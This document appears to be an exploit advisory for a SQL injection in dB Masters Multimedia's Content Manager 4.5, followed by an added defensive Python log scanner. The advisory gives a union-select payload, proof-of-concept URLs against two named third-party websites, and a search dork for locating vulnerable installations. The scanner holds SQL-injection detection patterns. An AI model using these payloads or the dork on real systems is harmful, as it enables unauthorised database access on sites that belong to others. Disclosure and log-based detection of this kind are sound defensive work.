dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln


[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability
Software : dB Masters Multimedia's Content Manager version 4.5
Vendor : http://www.dbmasters.net/
Author : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?n=xx&id=[SQL]


[o] Proof of Concept
http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--


[o] Dork
"Powered by dB Masters Multimedia's Content Manager"
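
For the defending side, an added example (not part of the original advisory): a Python check that scans web-server access-log lines for requests to index.php whose n or id parameter is not a plain integer, which is the request shape shown above. It assumes combined-format logs and that both parameters are meant to be non-negative integers; the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate n and id values are non-negative integers.
INT_RE = re.compile(r"\d+")
# Tokens that separate an injection attempt from a merely malformed value.
SQL_RE = re.compile(r"union\s+select|information_schema|--|/\*", re.I)

def check_line(line):
    """Return (param, decoded_value, reason) tuples for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    findings = []
    # parse_qs percent-decodes and maps '+' to a space, so encoded
    # variants of the same payload are compared in decoded form.
    params = parse_qs(url.query, keep_blank_values=True)
    for name in ("n", "id"):
        for value in params.get(name, []):
            if INT_RE.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_RE.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    return [(i, f) for i, line in enumerate(lines, 1) for f in check_line(line)]

# Constructed sample log lines (documentation IP ranges, hypothetical /cms/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/index.php?n=62&id=57 HTTP/1.1" 200 5123',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/index.php?n=62&id=-57+union+select+1,version()-- HTTP/1.1" 200 4810',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cms/index.php?n=1&id=-1%20UNION%20SELECT%201,version()-- HTTP/1.1" 200 4799',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /cms/index.php?n=xx&id=3 HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:01:02 +0000] "GET /cms/style.css?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, (param, value, reason) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {param}={value!r} [{reason}]")
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.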

